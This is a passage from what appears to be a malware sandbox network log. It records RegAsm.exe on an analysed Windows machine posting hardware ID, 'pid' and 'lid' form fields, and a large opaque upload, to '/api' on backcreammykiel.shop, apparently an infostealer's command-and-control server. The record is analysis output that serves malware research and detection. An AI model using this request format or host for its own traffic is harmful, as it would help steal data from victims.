2024-06-23 04:54:18 UTC	8787	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"54621DB669031C2126BA76F88A35DAEB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@Qude
2024-06-23 04:54:18 UTC	812	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 04:54:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=go9gp3qbappt45vdpl68l2j0bj; expires=Wed, 16-Oct-2024 22:40:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zqfTcw%2B5gbYcVHOvAR0JRAFyP6cPGD5ZGAnYOJXxX39O4pgMk2WRzmphmQvbvgQl%2BrTq%2BK3%2FdUdXDuYZKfGBSaPcvIegfY2Lvazp9%2FlCBbw9BqSj5WT5sGDmie8O1OUQMK2c0heGNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8981e11b6d3dc3fd-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 04:54:18 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 04:54:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49739	104.21.90.18	443	6960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 04:54:19 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20440 Host: backcreammykiel.shop
2024-06-23 04:54:19 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"54621DB669031C2126BA76F88A35DAEB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@Qude
2024-06-23 04:54:19 UTC	5109	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 Data Ascii: `M?lrQMn 64F6(X&7~`a
2024-06-23 04:54:19 UTC	818	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 04:54:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b16np13le35tk0fm4ijton5oon; expires=Wed, 16-Oct-2024 22:40:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vHzJtcmHtxnNky5UQQFBc8ClE63ACnGXXBB1ppFANkjV0W%2B7PE2FfzoWrwrU%2BCKgWJ52WX2Wrk0SzJ5iSEa1wcYjR7CdWXbeEc%2Bx%2BB%2BsRWNrouQkGXVvDs%2F%2FegZJdYqnOxf6Y%2Bvd5Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8981e12169954387-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 04:54:19 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 04:54:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	104.21.90.18	443	6960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 04:54:20 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5447 Host: backcreammykiel.shop
2024-06-23 04:54:20 UTC	5447	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"54621DB669031C2126BA76F88A35DAEB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@Qude
2024-06-23 04:54:20 UTC	808	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 04:54:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rmk70vfeiofeq62v5s9tkj85ip; expires=Wed, 16-Oct-2024 22:40:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GAkcnyfLFGrh9NVzUSiGSMFwikcihYaeOeKRQfqofcH%2Fne5yOE%2BzXj0EXGu4dl5oy7d1Ut7G2l8ZwCu8HVQZK2TwJ%2BtdRuKMThdRMXWUtoHdSYep2LhiIV6d4PQH0upaw6koRaZdjQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8981e1282f5a42a9-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 04:54:20 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 04:54:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	104.21.90.18	443	6960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 04:54:21 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1266 Host: backcreammykiel.shop
2024-06-23 04:54:21 UTC	1266	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"54621DB669031C2126BA76F88A35DAEB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@Qude
2024-06-23 04:54:21 UTC	804	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 04:54:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a1urvn2ovij4tp7gknmcfjksnj; expires=Wed, 16-Oct-2024 22:41:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lscCgzrpha77i5uJuYvv5jeatK3sSr9XqzePCwsQVnXlcDg42yZBYcU64QPRjDt2zQWDa2ZcBKdfC7Mpw2UxzWHzH8jjKgAjIJLMbu5y7kSbeaJnS9crGp4qFp0f%2FZawumkdPx7REw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8981e12f7ef241e0-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 04:54:21 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 04:54:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	104.21.90.18	443	6960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 04:54:22 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 565822 Host: backcreammykiel.shop
2024-06-23 04:54:22 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"54621DB669031C2126BA76F88A35DAEB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@Qude
2024-06-23 04:54:22 UTC	15331	OUT	Data Raw: b9 8d 62 c7 45 16 58 ac 02 0c b5 67 3b 5c 9f 93 44 c4 12 92 f0 ea e2 d0 21 dd 5e 8f 96 f0 ca 16 bf 1a cb d1 50 7f fa 51 50 82 96 93 ee 3c 08 4a 54 09 09 5b 88 91 1b be a3 71 c5 ea d3 fa 3f 8a 51 f1 5b b2 e1 6a 1d 45 e2 43 51 17 6d b9 25 b9 0f e3 d3 c8 a8 10 6c 76 2d 2f 8f de 9a 55 d2 3c 43 d1 e2 52 6a ae 77 63 9a 88 35 cd d1 46 5f 24 d9 e3 44 bf 24 d5 8c 32 21 e8 a9 04 4e ec 55 06 0d 21 c0 cb 6b ee 35 4b 05 77 ef 44 f4 74 25 e9 6f bf d4 1b 56 03 a2 70 64 69 f5 ed f9 36 fd 6b 0a 2a bc 37 a2 ec 2f 92 f8 41 5d bd e7 83 6b ac 4a 32 69 cd 31 dc a3 9a 8b e2 ca 07 65 41 64 88 bd 01 ea 85 78 76 45 d9 5a 3c a0 b0 66 7e 0a 02 c6 ba bf e2 9a d1 03 a6 3c 16 ff 17 5b f0 83 22 20 51 3b 81 27 37 78 64 42 28 08 82 91 b0 00 b0 a4 04 c7 84 73 f1 4e ca 37 38 05 cd 1f 42 6d Data Ascii: bEXg;\D!^PQP<JT[q?Q[jECQm%lv-/U<CRjwc5F_$D$2!NU!k5KwDt%oVpdi6k*7/A]kJ2i1eAdxvEZ<f~<[" Q;'7xdB(sN78Bm
2024-06-23 04:54:22 UTC	15331	OUT	Data Raw: 4b 1b 55 8c 8a 01 ea f9 f1 bb 56 f1 06 18 b4 18 b8 e3 00 65 b5 84 b9 52 54 a7 67 8b 1f 3b f1 31 45 8f d8 b5 66 a5 4b dd 1c 0d f3 e4 24 88 05 ab 77 7c c9 25 f1 83 55 c3 30 9b f3 ef 2c ae 70 fd 1d 55 f5 4a 8a 7c 5a 98 18 b0 05 fd d8 db 6e d0 0c c9 ca 38 ba 83 3f 71 bd 26 55 dd da 1d 0c 45 09 a1 a3 50 a4 b2 67 36 cb 62 26 04 82 7e ad 8f a5 91 4b 57 97 f8 c3 66 97 46 08 11 b1 f7 ae 3d 21 27 b9 a3 25 50 4c 70 e8 e9 d8 ab 8a 42 95 75 2a d5 7a fc 06 df a9 3b 34 75 15 f0 f2 38 97 6c c1 9e 91 19 85 87 83 18 b0 fc 14 4c 51 46 2b 88 b6 cb 46 dd 1a 8c 85 c7 43 24 c3 a4 6f c3 dd 21 52 00 a2 dd b9 7e 88 c8 bf 73 75 2f c5 a9 20 a0 d5 48 bd 75 74 6b c5 95 31 11 8b 0b 14 32 5c 4f de 65 8e 1b 4d 67 bc 50 ef 6e a2 e9 a9 20 09 84 fa 6b 8c 8a 1e 87 80 0d 2d 46 cd 5a 87 df 9b Data Ascii: KUVeRTg;1EfK$w\|%U0,pUJ\|Zn8?q&UEPg6b&~KWfF=!'%PLpBu*z;4u8lLQF+FC$o!R~su/ Hutk12\OeMgPn k-FZ
2024-06-23 04:54:22 UTC	15331	OUT	Data Raw: 14 6d 64 e1 cd b9 a1 f7 c7 63 28 f1 60 04 a3 fd d3 4b 11 56 5f 6e 97 29 ac 2a 88 c5 6b e3 52 66 9e 9e fe cd 79 ee 7b 22 5b 99 9a 1a c8 1a 4e 47 98 45 19 d7 11 d1 e1 53 33 9d 32 85 8d 31 3e 3b 1c c9 a8 46 90 59 77 a8 e1 86 8f d7 75 e1 81 6f 92 8e 28 c9 bb f0 b3 04 9c ce b5 3c af 73 a4 67 c0 d6 35 4c 10 6d 79 fe 91 4a fa 83 5f b8 2a 1b e0 e9 7c ab 4f 38 cf 9f 5f 03 bc 78 da 6e 92 11 1d 25 9a 23 ed bf 21 09 d1 7a 67 08 e9 c8 a5 3e b3 07 a2 1c 7a ca 32 4a 52 6a c9 85 8c 0d 7a d9 7e 1f 97 b8 9f a0 01 8a 60 9b e1 f4 0a b4 c6 11 6f 25 c0 c7 58 4a 6b d0 48 fe e4 e0 fa cb ea 34 48 a9 7b cb ab f4 de f2 83 67 01 48 5b ac ad f7 37 9d 39 3f f8 9e 6b a7 5a 51 9f 32 1a 2e a7 7f 41 d2 18 bd d1 e2 f4 36 20 dc ae 3e a6 20 de 1c 13 3c 1b 70 35 51 67 bf 1e 4b e9 da 79 3e c6 Data Ascii: mdc(`KV_n)kRfy{"[NGES321>;FYwuo(<sg5LmyJ_\|O8_xn%#!zg>z2JRjz~`o%XJkH4H{gH[79?kZQ2.A6 > <p5QgKy>
2024-06-23 04:54:22 UTC	15331	OUT	Data Raw: c5 21 90 7d 93 57 fd c0 72 90 08 44 3b f9 ef e1 dd b6 10 ef ef 68 a4 42 dc c6 fc 9b a5 1a 20 87 a6 85 02 d0 06 66 d3 cc 0b c5 2b 3f 5c ec f1 66 32 cd 13 9a f3 7e 97 67 c4 6d 76 ea f0 15 b4 1e 1b 4e b3 08 37 e7 99 ee 6e b2 40 f8 2b b6 2b a4 c8 07 e4 bb bc ff f2 10 6e df 66 95 c9 9b ca 20 40 a5 99 e7 54 4e 8b 8d 06 fb 4a 01 5e 1a 5d ba e7 c5 dd 6a ff b2 43 e4 1e e6 fa de 1f a8 d6 10 5f 51 b0 63 a1 b3 9c e7 8e c0 9b 89 3e d5 52 00 b1 f2 b5 cc f3 ad b8 69 66 29 ca 6e 6a 4e 75 e2 39 58 df 3b ae 1e d8 f1 88 14 0b f7 8f 79 79 e0 89 e9 e8 f0 29 b1 ae 3e 4a c5 a3 c7 7b 52 0c d6 de 7f 4b 26 62 45 dd d3 66 79 7c c1 eb a6 1b 84 b7 3e e2 b8 91 45 c4 9e a4 c9 b2 82 0c e8 89 24 1b 95 8c a7 eb c9 66 26 52 d4 f6 f5 f1 67 9f 53 7e c4 8d 77 d6 1f c5 07 f0 5d 9d e4 57 84 01 Data Ascii: !}WrD;hB f+?\f2~gmvN7n@++nf @TNJ^]jC_Qc>Rif)njNu9X;yy)>J{RK&bEfy\|>E$f&RgS~w]W
2024-06-23 04:54:22 UTC	15331	OUT	Data Raw: 54 72 12 12 5b be ca ab a7 8b 5c df be ec 9f 3e 3a 97 16 47 1f 5c 52 5a 6d 09 0c c9 1c 80 03 6e 10 9c b3 6a 1e b4 95 42 36 89 19 15 bb c5 67 0e a1 80 b9 f5 c5 d7 d4 02 73 d0 1c c4 62 d4 80 1d b5 36 18 24 3a f4 db 3b 47 2b 09 9f e0 a4 bf c6 5c d7 28 fd 85 9c 4b d9 e8 fb 45 93 25 0a 14 3a e9 4a 83 f4 d4 39 27 d9 ea 73 0c f1 30 38 f0 02 7e 51 72 32 c3 0c db ac 16 9c f9 33 3e 81 95 20 f5 ea ab 3b 52 74 ea d5 db b0 11 ae f3 7d 2f 82 2d b1 d3 53 0c 51 a7 0c 64 f8 e9 b5 f8 2d 57 e0 a7 8c 30 e3 46 81 86 56 1d 1a 66 51 87 40 91 01 11 42 86 9d 2f 22 3f dd 4a 28 0a 0a 44 f6 37 10 ee 2c 8d da 75 2e ba 29 9e df f3 ab 7e 41 7e 10 04 31 fc 96 1e 95 ba 0f 09 39 f8 5f d8 fb f2 31 fd 1a f0 64 d0 76 a0 1c df 6e f0 b1 57 c2 4d e8 9e e4 bd 9f e3 db 4b 3e aa ea 22 73 fd 9f 26 Data Ascii: Tr[\>:G\RZmnjB6gsb6$:;G+\(KE%:J9's08~Qr23> ;Rt}/-SQd-W0FVfQ@B/"?J(D7,u.)~A~19_1dvnWMK>"s&
2024-06-23 04:54:22 UTC	15331	OUT	Data Raw: 5a 40 19 7a ba 80 a0 a7 83 20 2c 8e 7f ef 2f f0 dd f4 e2 d9 1f 6b cf 08 54 4a aa 58 c5 ce e5 15 c5 b7 c7 a2 5d b8 2c b3 28 32 72 22 f7 79 07 45 4e 5d d4 e9 df be c4 b2 6a 74 04 c2 9c 8f 45 a3 61 54 60 d2 5e a2 0a b2 03 a1 6b 43 7b aa 72 c0 53 1e 1d 6a 4d cb e4 d1 b1 d8 24 9f b0 25 47 c0 08 8c 5b 60 34 32 2c 5b e7 d5 dd d5 c3 e0 4d 57 bb ae 16 39 78 96 a3 41 79 b2 5e 33 0b 8e a7 9a 38 56 a7 f0 e5 f0 39 a0 c3 34 b3 f1 57 b3 28 b8 16 3d 2c 13 0b c6 39 ba 03 49 55 1f d6 4e 7a b0 11 1d cf 39 38 96 4a a7 86 88 41 8d af 10 04 58 77 fe 2c 85 1a 3e 1a 62 b4 9d a4 ca 29 fd bd 8c df 7c f0 3c 17 11 13 80 49 6a 12 22 46 06 70 ec ba 1e c3 a6 86 56 b0 4d 47 2d 2d e7 e9 a9 36 06 b2 6f 17 46 05 a5 c9 f4 bb b0 98 9e 20 cb a7 dc 5e 0b b8 71 33 bd 31 7c 23 cf 43 ee 09 84 ff Data Ascii: Z@z ,/kTJX],(2r"yEN]jtEaT`^kC{rSjM$%G[`42,[MW9xAy^38V94W(=,9IUNz98JAXw,>b)\|<Ij"FpVMG--6oF ^q31\|#C
2024-06-23 04:54:22 UTC	15331	OUT	Data Raw: c5 63 00 75 e9 b7 c1 df 4a f4 2a b4 44 2a 59 a1 a3 ac 79 5b f5 94 f3 83 69 dd db ce e8 47 df 26 e4 54 7c 70 3d 0d b7 60 ff 50 41 53 67 d2 e2 3a 53 f3 74 ee 23 e2 c0 3e dd dd a0 5d 5b 15 3a 45 cf b2 36 0e 33 05 26 b9 6f 1f 36 17 a1 dd 79 35 f2 44 71 4b c6 0a 78 06 51 a0 e5 c0 42 9b 64 70 11 d6 22 35 f8 c2 54 46 eb 90 35 48 a0 fe 38 b2 22 dc e0 5d 29 ef 22 db c1 58 c8 dc d5 62 ec 9a 1a 5a c2 bc 38 91 e5 83 f0 7b ca 88 fe 17 be ce c7 09 11 7e f7 d2 55 c5 32 94 a9 72 4e 91 8e 05 cd 63 63 b8 a5 14 e6 05 c0 28 d6 07 42 9d 46 93 fe 9f a7 9e 4d f7 35 82 03 d7 ee 46 0f b1 af 92 e7 6d 44 12 3c f2 2f d7 f5 9d 14 5f 23 97 b0 33 6d 44 e2 34 aa 61 a0 33 5c d1 1c 24 1b de f5 db fd 4b c1 e2 25 84 55 90 f3 f8 bc e8 23 06 42 a3 62 f4 9a fc e4 50 35 79 05 3f d1 58 d6 ff 8e Data Ascii: cuJDYy[iG&T\|p=`PASg:St#>][:E63&o6y5DqKxQBdp"5TF5H8"])"XbZ8{~U2rNcc(BFM5FmD</_#3mD4a3\$K%U#BbP5y?X
2024-06-23 04:54:22 UTC	15331	OUT	Data Raw: a1 0c 73 af 3f 30 06 b9 c5 91 19 ee c5 82 9a 62 27 98 f2 ab 31 72 c5 87 00 a1 da b8 94 0d 50 93 ac 82 65 20 ca 85 98 d1 9c ca 89 94 e7 41 43 00 da 9c 10 e1 2b 60 0f 57 d8 8e 66 c4 55 4e 2c 7c 17 0d 5f 48 59 06 93 d8 51 a3 10 41 a7 08 d4 03 7d e7 04 2d ae a8 43 42 c4 e9 55 25 99 2b ca 1a bc 66 07 e5 5e 6c 3f 0c b1 e7 a2 62 1a 2c 3f cb 67 56 78 b0 55 93 85 92 2e 84 b9 96 44 e9 03 4f 65 8d 71 14 82 d5 2a 8a 1d 4a f1 ac 14 c1 cb d3 e5 87 e4 3b 48 02 5d 18 ac 2e b2 e5 90 18 2c f2 5a 21 80 2b 76 38 e8 db 3a 2e bd 2f 8f 76 72 5a 37 ad 28 e8 03 4d 40 43 6c be 55 34 fb 2a fe a0 99 c9 27 f4 ae 2d 4d a9 13 18 4e 75 cc 90 27 e2 d3 e5 15 f0 b2 70 8d 50 ed 87 27 89 8c fc a5 71 9a 07 c5 9f 67 09 4c 60 51 8b 31 fa c8 f3 c3 a6 d4 28 9f c8 f0 0c c6 08 47 70 a4 65 cc 9f 72 Data Ascii: s?0b'1rPe AC+`WfUN,\|_HYQA}-CBU%+f^l?b,?gVxU.DOeqJ;H].,Z!+v8:./vrZ7(M@ClU4'-MNu'pP'qgL`Q1(Gper
2024-06-23 04:54:22 UTC	15331	OUT	Data Raw: ff b1 97 f3 60 35 7a 06 6f 59 42 88 bc 20 ba 39 5d b4 7e b7 38 a3 57 b0 0a 1d 68 46 82 bc 1e a8 11 00 fd 07 0d 03 54 1c e1 79 63 3f 0e fd 9a 37 5a 4e 94 03 62 6a 74 41 06 22 78 28 45 96 0b 5c e2 a0 b8 cd 5d 5c a0 33 df 79 be 23 cf 69 7a 20 78 f9 24 b3 f6 dd d9 b9 61 f4 71 03 33 fa 7d 2e 38 75 90 36 0b 18 57 08 3b 1a a5 4a e1 7f 1d 50 6e 90 6c 4a bc f8 e3 4e 56 02 44 a9 52 8d 3e 1f 96 78 f9 5e 7a 14 c5 67 30 76 b6 7a be 34 e3 fb 10 88 30 68 39 2a aa c6 21 53 43 72 b9 cd cb 83 de 71 6c 2d 4e 7c 88 ad 16 3f 66 89 df 2d e4 e2 87 89 3b bb 22 b1 fd 5e fb 28 39 c8 6e 6e 7d 11 c0 ed 00 14 fd f7 0d 57 b4 2e dd c8 c9 68 4b fe 15 ab 64 db 59 c7 b3 75 e1 4a 5f 70 2a 20 36 89 66 33 f2 a7 86 2e 15 d6 ae 5b ae 65 01 0d cc 1a 00 10 17 37 86 83 3b 4e 